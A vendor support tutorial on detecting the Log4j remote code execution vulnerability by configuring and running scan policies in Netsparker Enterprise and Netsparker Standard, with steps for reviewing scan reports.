SUPPORT

Contact Support

OPEN A TICKET

Detecting Log4j vulnerability with Netsparker

Netsparker can detect whether you have Java applications vulnerable to remote code execution attacks targeting the Log4j library.

  • Thousands of Java applications across the world are wide open to remote code execution attacks targeting the Log4j library.
  • A fix is already available, so the recommended course of action is to update to Log4j 2.17.0 (or newer) immediately.

For further information about Log4j, see Why Log4Shell could be the worst software vulnerability ever and Log4J FAQ.

To get the latest news and resources from Invicti on the Log4j crisis, visit Log4j vulnerability resource center.

To detect whether you have the Log4j library in your environment, you can utilize Netsparker Enterprise and Netsparker Standard. 

This tutorial provides a step-by-step guide on how to identify the Log4j vulnerability using Netsparker Enterprise and Netsparker Standard.

Make sure your server where Log4j is running can access r87.me or internal Hawk - depending on your use case. For further information about Netsparker Hawk, see How Netsparker Hawk Finds Vulnerabilities.

Using Netsparker Enterprise On-Premises? If you installed Internal Hawk, make sure to enter its address to a scan policy. Otherwise, make sure to whitelist r78.me.

Detecting the Log4j vulnerability with Netsparker Enterprise

To detect the Log4j vulnerability with Netsparker Enterprise, follow these steps:

  1. Configure a scan policy for Log4j
  2. Scan your application with the scan policy created in the 1st step
  3. Review the scan result
Using internal agents? To access Netsparker's Hawk server - r87.me- to detect Out of band vulnerabilities, please whitelist the following ports on your agent server: TCP 80 and 443, UDP 53. 

Step 1. Configuring a scan policy for Log4j

You can configure a scan policy to run a security check to detect the Log4j vulnerability in your environment.

How to configure a scan policy for Log4j
  1. Log in to Netsparker Enterprise.
  2. From the main menu, select Policies > New Scan Policy.
  3. From the New Scan Policy page, enter a name and a description for your new scan policy.

  1. From the Security Checks section, select Code Evaluation > Code Evaluation (Out of Band).

  1. Enter Log4j to filter the security checks. Make sure Log4j checks are selected.
  2. From the Attacking section, select Attack Referer Header and Attack User-Agent Header.

  1. From the Attacking section, deselect Optimize Header Attacks.

From the Header section, make sure to configure HTTP Headers attack according to your environment.
  1. Select Save.

Step 2. Scanning your application with the custom scan policy

After you create a custom scan policy that includes the Log4j checks, you can now launch a scan to detect whether you are vulnerable to the Log4j attacks.

How to scan your application with the custom scan policy
  1. Log in to Netsparker Enterprise.
  2. From the main menu, select Scans > New Scan.
Before scanning your website in Netsparker Enterprise, make sure you have added a website (Adding a website in Netsparker Enterprise).
  1. In the Target URL field, enter the URL.
  2. From the Scan Policy, select your custom policy created in the 1st Step.

  1. Select Launch to scan.
How to run group scan with the custom scan policy
  1. Log in to Netsparker Enterprise.
  2. From the main menu, select Scans > New Group Scan.
  3. From the New Website Group Scan page, select Website Group from the drop-down menu.

  1. From the Scan Policy drop-down, select your custom scan policy created in the 1st Step.
  2. Select Launch to scan.

Step 3. Reviewing scan result

When you launch the scan, Netsparker Enterprise crawls and attacks your web application to identify the Log4j vulnerability.

Once Netsparker completes the scanning, the application will send an email containing the link to the report. If you did not configure an email notification, you can log in to Netsparker Enterprise and check your report.

How to access your scan report
  1. Log in to Netsparker Enterprise.
  2. From the main menu, select Scans > Recent Scans.
  3. Next to the relevant scan, select Report.
  4. On the Scan Summary page, scroll down to the Technical Report section to view your scan report.

Detecting the Log4j vulnerability with Netsparker Standard

To detect the Log4j with Netsparker Standard, follow these steps:

  1. Update Netsparker Standard to the newest version
  2. Configure a scan policy for Log4j
  3. Scan your application with the scan policy created in the 2nd step
  4. Review the scan result

Step 1. Updating Netsparker Standard to the newest version

You need to update your Netsparker Standard to the newest version, so Netsparker Standard can detect the Log4j vulnerability in your application.

If you already have Netsparker Standard 6.3.033782, please skip this step.
Installing Netsparker Standard for the first time? For further information, see Installing Netsparker Standard.

Downloading Netsparker Standard with your Enterprise license? See Downloading Netsparker Standard from Netsparker Enterprise.
How to update Netsparker Standard
  1. Open Netsparker Standard.
  2. At the prompt, select Download & Install.
You can also manually check for updates. From the Help tab, select Check for Updates. This will check whether a new version of Netsparker Standard has been released. (Alternatively, press CTRL+U.)

Netsparker will download the update, and it will be applied as it restarts Netsparker Standard.

Step 2. Configuring a scan policy for Log4j

With the newest version installed on your environment, you can now configure a scan policy to run a security check to detect the Log4j vulnerability in your environment.

How to configure scan policy for Log4j
  1. Open Netsparker Standard
  2. From the main ribbon, select Home > Scan Policy Editor.

  1. Select New.
  2. Enter a name for your new scan policy. (Please note that this tutorial uses Log4j Policy as the custom scan policy name.)
  3. From the Security Checks, double-click Code Evaluation, then select Code Evaluation (Out of Band).

  1. From the Security Checks section, enter Log4j to filter.
  2. Select (Java) Log4j RCE and (Java) Log4j RCE Encoded.

  1. Select Apply.
  2. From the Attacking section, select Attack Referer Header and Attack User-Agent Header.

  1. From the Attacking section, deselect Optimize Header Attacks.

From the Header section, make sure to configure HTTP Headers attack according to your environment.
  1. Select Apply, then OK.

Step 3. Scanning your application with the custom scan policy

After you created a custom scan policy to detect the Log4j vulnerability in your environment, you can run a scan.

How to scan your application to detect the Log4j vulnerability
  1. Open Netsparker Standard.
  2. From the main ribbon, select New.
  3. From Start a New Website or Web Service Scan, enter your website. 

  1. From the Scan Policy drop-down, select your custom scan policy.
  2. Select Start Scan to launch the scan.

Netsparker Standard starts scanning your web application to detect whether there is Log4j vulnerability in your environment.

Step 4. Reviewing scan result

When Netsparker completes the scan, you can see the result in the Issues and Sitemap panels. The Issues panel lists all detected vulnerabilities and other issues.

Netsparker

Highly accurate, fast & easy-to-use Web Application Security Scanner

Get a demo